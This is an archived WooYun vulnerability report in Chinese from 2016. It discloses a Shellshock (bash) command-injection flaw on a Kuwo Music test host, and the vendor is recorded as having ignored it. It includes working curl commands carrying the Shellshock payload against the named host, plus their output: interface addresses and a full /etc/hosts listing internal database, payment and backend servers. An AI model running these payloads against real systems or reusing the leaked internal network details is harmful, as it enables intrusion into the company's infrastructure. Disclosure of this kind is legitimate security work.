当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171346

漏洞标题:酷我音乐某站命令执行

相关厂商:酷我音乐

漏洞作者: 路人甲

提交时间:2016-01-20 14:21

修复时间:2016-01-25 14:30

公开时间:2016-01-25 14:30

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

酷我某站命令执行

详细说明:

managetest.kuwo.cn存在bash 命令执行漏洞
curl -A "() { foo;};echo;/sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgi
eth0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38
inet addr:60.28.205.41 Bcast:60.28.205.63 Mask:255.255.255.224
inet6 addr: fe80::21a:a0ff:fe0d:fb38/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1150352590 errors:0 dropped:0 overruns:0 frame:0
TX packets:2511972745 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:228359309665 (212.6 GiB) TX bytes:972996034118 (906.1 GiB)
Interrupt:169 Memory:f4000000-f4011100
eth0:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38
inet addr:60.28.205.48 Bcast:60.28.205.63 Mask:255.255.255.224
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f4000000-f4011100
eth1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.42 Bcast:192.168.255.255 Mask:255.255.0.0
inet6 addr: fe80::21a:a0ff:fe0d:fb36/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7819254624 errors:0 dropped:0 overruns:0 frame:0
TX packets:11484217788 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3514910215382 (3.1 TiB) TX bytes:14712204358111 (13.3 TiB)
Interrupt:169 Memory:f8000000-f8011100
eth1:0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.136 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f8000000-f8011100
eth1:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.139 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f8000000-f8011100
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:111515227 errors:0 dropped:0 overruns:0 frame:0
TX packets:111515227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:66706130576 (62.1 GiB) TX bytes:66706130576 (62.1 GiB)
lo:0 Link encap:Local Loopback
inet addr:60.28.205.61 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1
lo:1 Link encap:Local Loopback
inet addr:60.28.193.246 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1
lo:2 Link encap:Local Loopback
inet addr:127.0.0.2 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1

漏洞证明:

curl -A "() { foo;};echo;/bin/cat /etc/hosts" http://managetest.kuwo.cn/cgi-bin/test-cgi
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 backup42.com backup42 localhost
127.0.0.1 image.kuwo.cn
#127.0.0.1 star.kuwo.cn
192.168.1.120 s120
192.168.0.80 lyric80
192.168.0.82 lyric82
192.168.0.81 lyric81
192.168.0.88 lyric88
192.168.0.96 lyric96
192.168.0.97 lyric97
60.29.226.181 www.kuwo.cn
60.29.226.181 kzone.kuwo.cn
192.168.0.248 bkserver248
192.168.0.187 bkserver187
192.168.0.179 bkserver179
192.168.0.169 bkserver169
192.168.0.170 bkserver170
192.168.210.240 bkserver240
192.168.0.190 bkserver190
192.168.0.43 bkserver43
192.168.0.174 bkserver174
192.168.0.39 bkserver39
192.168.0.40 bkserver40
192.168.217.183 bkserver183
192.168.0.189 bkserver189
192.168.0.26 bkserver26
#192.168.210.85 bkserver85
192.168.210.71 bkserver85
192.168.0.56 bkserver56
60.28.199.29 bkserver29
60.28.210.125 bkserver125
#60.28.205.61 nplserver.kuwo.cn
#60.28.205.41 fang1.koowo.com
#60.28.205.41 fang2.koowo.com
#60.28.205.41 fang.koowo.com
127.0.0.1 test41.kuwo.cn
127.0.0.1 ksingservice.kuwo.cn
#127.0.0.1 star.kuwo.cn
#127.0.0.1 mv.koowo.com
#60.28.205.48 fang1.koowo.com
#60.28.205.48 fang2.koowo.com
#60.28.205.48 fang.koowo.com
127.0.0.1 fang1.koowo.com
127.0.0.1 fang2.koowo.com
127.0.0.1 fang.koowo.com
#60.28.205.41 www.kuwo.cn
#221.238.18.39 kzone.kuwo.cn
#60.29.225.24 kzone.kuwo.cn
60.28.205.48 kzone48.koowo.com
60.28.205.48 kzone48.kuwo.cn
#60.28.205.48 star.koowo.com
#the following settings are for koowo web develop
127.0.0.1 mainwebserver
192.168.0.174 mainwebserver_T
#web servers
192.168.0.42 localwebserver
192.168.0.57 otherwebserver1
192.168.0.188 otherwebserver2
192.168.0.184 otherwebserver3
192.168.217.171 otherwebserver4
192.168.0.74 otherwebserver5
192.168.201.12 otherwebserver6
192.168.217.185 otherwebserver7
192.168.217.168 ucmwebserver1
192.168.217.173 ucmwebserver2
#backend servers
192.168.0.169 lhserver
192.168.0.169 scoreserver
192.168.0.169 loginserver
192.168.0.169 guestserver
192.168.0.169 musicstatserver
192.168.0.49 lhbakserver
60.28.205.41 profilecacheserver
192.168.0.21 profileoscacheserver
192.168.0.21 usercacheserver
192.168.0.187 newsserver
192.168.0.187 activityserver
192.168.206.247 reslist.kuwo.cn
192.168.0.80 shouji.kuwo.cn
#databases
192.168.0.185 queryservereditor
192.168.0.185 queryserver185
192.168.201.44 queryserver44
192.168.0.185 queryservermlog
192.168.0.186 queryserver186
#192.168.0.42 queryserver186
192.168.0.42 queryserver41
192.168.0.188 queryserver188
192.168.0.185 queryserver46
192.168.0.177 queryserver177
192.168.210.76 vipuserdatabaseserver
192.168.0.169 queryserver43
192.168.201.43 queryserver20143
192.168.0.189 queryserver189
#192.168.217.171 queryserver171
#192.168.210.104 queryserver171
192.168.226.167 queryserver171
60.29.226.168 queryserver190
192.168.217.171 queryserver74
192.168.201.16 queryserver16
192.168.201.17 queryserver17
192.168.10.50 queryserver50
192.168.10.51 queryserver51
192.168.210.125 queryserver87
#221.238.18.45 huangfan.kuwo.cn
60.28.204.156 huangfan.kuwo.cn
60.28.205.38 koowo.com
60.28.205.38 kuwo.cn
60.217.32.231 mail.koowo.cn
60.217.32.233 mail.kuwomail.com
192.168.199.24 queryserver29
192.168.0.42 local.kuwo.cn
#60.29.226.174 search.kuwo.cn
#192.168.0.53 search.kuwo.cn
#192.168.0.53 search.koowo.com
192.168.0.54 search.koowo.com
192.168.210.106 search.kuwo.cn
60.28.205.41 player.kuwo.cn
127.0.0.1 dh.kuwo.cn
60.28.205.57 css.kuwo.cn
#60.28.205.56 tips.kuwo.cn
60.28.205.39 data.search.kuwo.cn
#60.28.205.39 search.kuwo.cn
#192.168.0.53 search.koowo.com
#192.168.0.53 search.kuwo.cn
#60.29.226.174 search.kuwo.cn
#60.29.226.174 search.koowo.com
#192.168.0.146 nplserver.kuwo.cn
60.28.205.39 lyric.koowo.com
60.28.205.39 lyric.kuwo.cn
60.28.205.39 newlyric.koowo.com
60.28.205.39 newlyric.kuwo.cn
60.28.199.29 topmusic.kuwo.cn
60.28.199.24 queryserver24
218.27.132.18 mp3dl.cdn.kuwo.cn
#test env for dj backend
#60.28.193.252 gyhserver1.kuwo.cn
#kuwolive
#60.28.201.38 antiserver.kuwo.cn
#192.168.0.181 antiserver.kuwo.cn
#192.168.0.170 antiserver.kuwo.cn
#192.168.206.247 antiserver.kuwo.cn
192.168.195.120 antiserver.kuwo.cn
192.168.217.188 nksingserver.kuwo.cn
#game history
192.168.217.174 gamehistoryserver.kuwo.cn
#60.29.244.181 user.hvsop.cn
60.28.201.5 puppet.kuwo.cn
192.168.201.38 updateedit.kuwo.cn
# for zadan test
127.0.0.1 topic.kuwo.cn
127.0.0.1 pc.kuwo.cn
60.28.210.68 mobi.kuwo.cn
192.168.210.76 pay-master.db.kuwo.cn
192.168.226.167 pay-slave.db.kuwo.cn
192.168.201.30 pay-backup.db.kuwo.cn
192.168.210.76 vip-master.db.kuwo.cn
192.168.226.167 vip-slave.db.kuwo.cn
192.168.201.30 vip-backup.db.kuwo.cn
192.168.201.43 vip-test.db.kuwo.cn
192.168.210.74 queryserverdd
#60.28.210.114 zhiboserver.kuwo.cn
#60.28.201.37 x.kuwo.cn
Content-type: text/plain; charset=iso-8859-1

修复方案:

实在不行删了test-cgi

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-25 14:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-20 14:36 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    mark

  2. 2016-01-20 16:59 | 牛 小 帅 ( 普通白帽子 | Rank:946 漏洞数:220 | 1.乌云最帅的男人 ...)

    @大师兄 大师兄你rank涨了哈

  3. 2016-01-21 08:09 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    @牛 小 帅 - - ! 跟不上你的脚步...